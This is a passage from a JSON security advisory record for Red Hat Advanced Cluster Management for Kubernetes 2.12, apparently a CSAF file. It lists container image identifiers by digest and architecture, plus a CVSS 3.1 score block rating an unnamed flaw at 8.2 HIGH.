"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
